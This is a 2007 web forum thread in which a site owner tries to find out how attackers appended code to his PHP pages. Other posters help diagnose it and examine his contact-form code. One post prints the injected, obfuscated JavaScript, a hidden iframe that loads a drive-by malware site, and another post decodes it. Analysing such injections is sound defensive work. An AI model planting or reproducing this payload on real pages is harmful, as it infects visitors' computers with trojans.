1. Computer problem? Tech Support Guy is completely free -- paid for by advertisers and donations. Click here to join today! If you're new to Tech Support Guy, we highly recommend that you visit our Guide for New Members.

Hacked but can't figure out how

Discussion in 'Web Design & Development' started by aewarnick, Jul 18, 2007.

Thread Status:
Not open for further replies.
Advertisement
  1. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    My site was hacked by some guy in Russia.
    He was able to write code to the bottom of all the index.php pages on my site.

    There was at least one place that I didn't parse input data to convert html code to safe code. The reason I didn't is because the data was shown only in a textbox and never seemed to be executed.

    The reason I can't figure out how I was hacked is that when I do:

    $s="echo 'hi';"
    echo $s;

    Just outputs:
    echo 'hi';

    The only way I can see that working is if I write the data they sent to a php file and then executed that php file. Am I right?
     
  2. MMJ

    MMJ Guest

    Joined:
    Oct 15, 2006
    Messages:
    3,625
    What is the code that receives the data in that "one place"?

    The only way that would work would be:
    PHP:
    <?php
    $s
    ="echo 'hi';";
    eval(
    $s);
    ?>
     
  3. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    I didn't know about eval, so I would have never used it in my code.

    So this is completely safe then:
    PHP:
    $data="anything a hacker would try to hack my site with.";
    <textarea name="userData"><?=$data;?></textarea>
    I shouldn't say completely safe because they can </textarea> and then do anything they want client side, but at least the server will be safe. So in this case, I would strip out the html tags and then it's perfectly safe both server side and client.
     
  4. MMJ

    MMJ Guest

    Joined:
    Oct 15, 2006
    Messages:
    3,625
    Safe from what? :confused:

    You are doing anything thats the same as:

    <textarea name="userData">anything a hacker would try to hack my site with.</textarea>

    Only if you do something with user input than it becomes unsafe.

    =-----=

    FYI the semicolon is unnecessary because its at the end of the code black.

    Same rule for applies for css

    *
    {
    color: blue;
    font-size: 50px <<no semicolon necessary here
    }
     
  5. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    I thought it would be understood that,
    "anything a hacker would try to hack my site with"
    represents code that a user would put into the textbox attempting to hack my site.

    About the semicolins, thanks, that will save the parser some time.
     
  6. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    This was written to the bottom of all my index.php files:
    PHP:
    <!-- o65 --><Script Language='Javascript'>
    <!--
    document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%67%70%74%2D%70%61%6C%2E%63%6F%6D%2F%73%63%72%69%70%74%73%2F%74%65%6D%70%6C%61%74%65%73%2F%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E'));
    //-->
    </Script><!-- c65 -->
    If anyone has a program to decipher what that is in plain text, it would be a big help in determining how much they know.
     
  7. MMJ

    MMJ Guest

    Joined:
    Oct 15, 2006
    Messages:
    3,625
    There is some misunderstanding between us.

    There has to be some php code that deals with user input. Can you post that code?

    It would be something like:
    PHP:
    echo $_POST['userinput'];
    The javascript you posted just makes a call to another site:
    HTML:
    <html>
    <iframe src=http://www.gpt-pal.com/scripts/templates/ frameborder="0" width="1" height="1" scrolling="no" name=counter>
    </iframe></html>
     
  8. cpscdave

    cpscdave

    Joined:
    Feb 25, 2004
    Messages:
    444
    doh MMJ beat me to the punch

    Just as a warning DO NOT go to that link. I messed up when tyring to decode it and executed the code. it's installed a bunch of trojans on my box now. SOB!!
     
  9. MMJ

    MMJ Guest

    Joined:
    Oct 15, 2006
    Messages:
    3,625
    Thats impossible. What makes you think that?

    I went to all the links, and I didn't get any download prompts or anything.

    What browser are you using?

    EDIT:

    127.0.0.1 [url]www.gpt-pal.com[/url] #[Javascript.Exploit]
    http://www.mvps.org/winhelp2002/hosts.txt
     
  10. cpscdave

    cpscdave

    Joined:
    Feb 25, 2004
    Messages:
    444
    I'm so ashamed.... but IE6.

    When I ran the code and it opened the iframe immediatlly my AV started poping up with infected files in my temporary files directory.

    I was able to remove them all with out too much difficulty. but still
     
  11. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    Here is the page that allows sumission of data:
    Note that I never use my ToSafeStr function before, like I do now.
    PHP:
    <?
    ob_start();
    include(
    $_SERVER['DOCUMENT_ROOT']."/begin.php");

    $userNameToSafeStr($_POST['userName']);
    //textarea data always has slashes put in data
    $userDataToSafeStr(stripslashes($_POST['userData']));
    $f$public_html."/ContactData/contact.txt";
    $emailaFileRead($public_html."/../email.txt");

    if(
    $userName)
    {
        
    $userName$userName.'@'.$_SERVER['REMOTE_ADDR'];
        
    $wrotemail($email"[".$userName."]"$userData);
        
    aFileApp($f"[".$userName."]\n\n".$userData."\n\n\n");
        
    ob_clean();
        
    $httpPathMakeBrowserPath($curDir."/contact.php");
        
    header("Refresh: 2; URL=$httpPath");
        
    ob_end_flush();
        if(
    $wrote)
            echo 
    "<center><font size='+2' color='red'>Success!!<br>Your message has been sent.<br><br>Redirecting...</font></center>";
        else
            echo 
    "<center><font size='+2' color='red'>Error: Could not send message. Try again.</font></center>";
        exit();
    }
    else if(
    $userData)
    {
        
    ob_clean(); ob_end_flush();
        echo 
    "<font size='+2' color='red'>Error:<br>I need an <b>Identity</b>.<br><b>Push back.</b></font>";
        exit();
    }

    ob_end_flush();
    ?>

    <p>There are 2 ways to contact me:<br>
      <br>
      1. Trust me with your email address and send me an email:<br>
      &nbsp;&nbsp;&nbsp;&nbsp;<a href="mailto:<?=$email?>"><font size="-1"><?=$email?></font></a><br>
      <br>
      2. For those of you who have had your trust abused:<br>
      &nbsp;&nbsp;&nbsp;&nbsp;Use the form below.<br>
      <br>
    </p><center>
    <form name="form1" method="post" action="contact.php">
     <p>Your Identity* 
        <input type="text" name="userName" style="width:100px;">
      </p>
      <p> 
        <textarea name="userData" wrap="soft" style="width:400px;" rows="15"></textarea>
      </p>
      <p>
        <input type="submit" name="Submit" value="Submit">
      </p>
    </form></center>

    <?
    include($public_html."/end.php");
    ?>
     
  12. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    I was looking in my logs and I think I found his address:
    87.118.110.210
    It's kind of unusual how the ip address changed when data was posted isn't it?

    PHP:
    87.118.110.210 - - [16/Jul/2007:01:46:30 -0500"GET /contact.php HTTP/1.1" 200 2431 "-" "-"
    67.101.84.208 - - [16/Jul/2007:01:46:34 -0500"POST /contact.php HTTP/1.0" 200 114 "http://foryouandi.com/contact.php" "Opera/9.0 (Windows NT 5.1; U; en)"
     
  13. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    Did more digging, they are hosted here:
    ns.km23547.keymachine.de

    I think they're the ones who have been spamming me like mad too with porn links.
     
  14. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
    I found something else in my code this morning.

    There was a place where the user could send a get variable that wasn't parsed to the php script and my code would append it to another string that was a directory and that directory they specified would be created.

    Could they do anything like they did just by exploiting the code of creating a directory?
     
  15. aewarnick

    aewarnick Thread Starter

    Joined:
    Sep 3, 2002
    Messages:
    828
  16. Sponsor

As Seen On
As Seen On...

Welcome to Tech Support Guy!

Are you looking for the solution to your computer problem? Join our site today to ask your question. This site is completely free -- paid for by advertisers and donations.

If you're not already familiar with forums, watch our Welcome Guide to get started.

Join over 733,556 other people just like you!

Loading...
Similar Threads - Hacked can't figure
  1. startupdev
    Replies:
    6
    Views:
    821
Thread Status:
Not open for further replies.

Short URL to this thread: https://techguy.org/597591

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice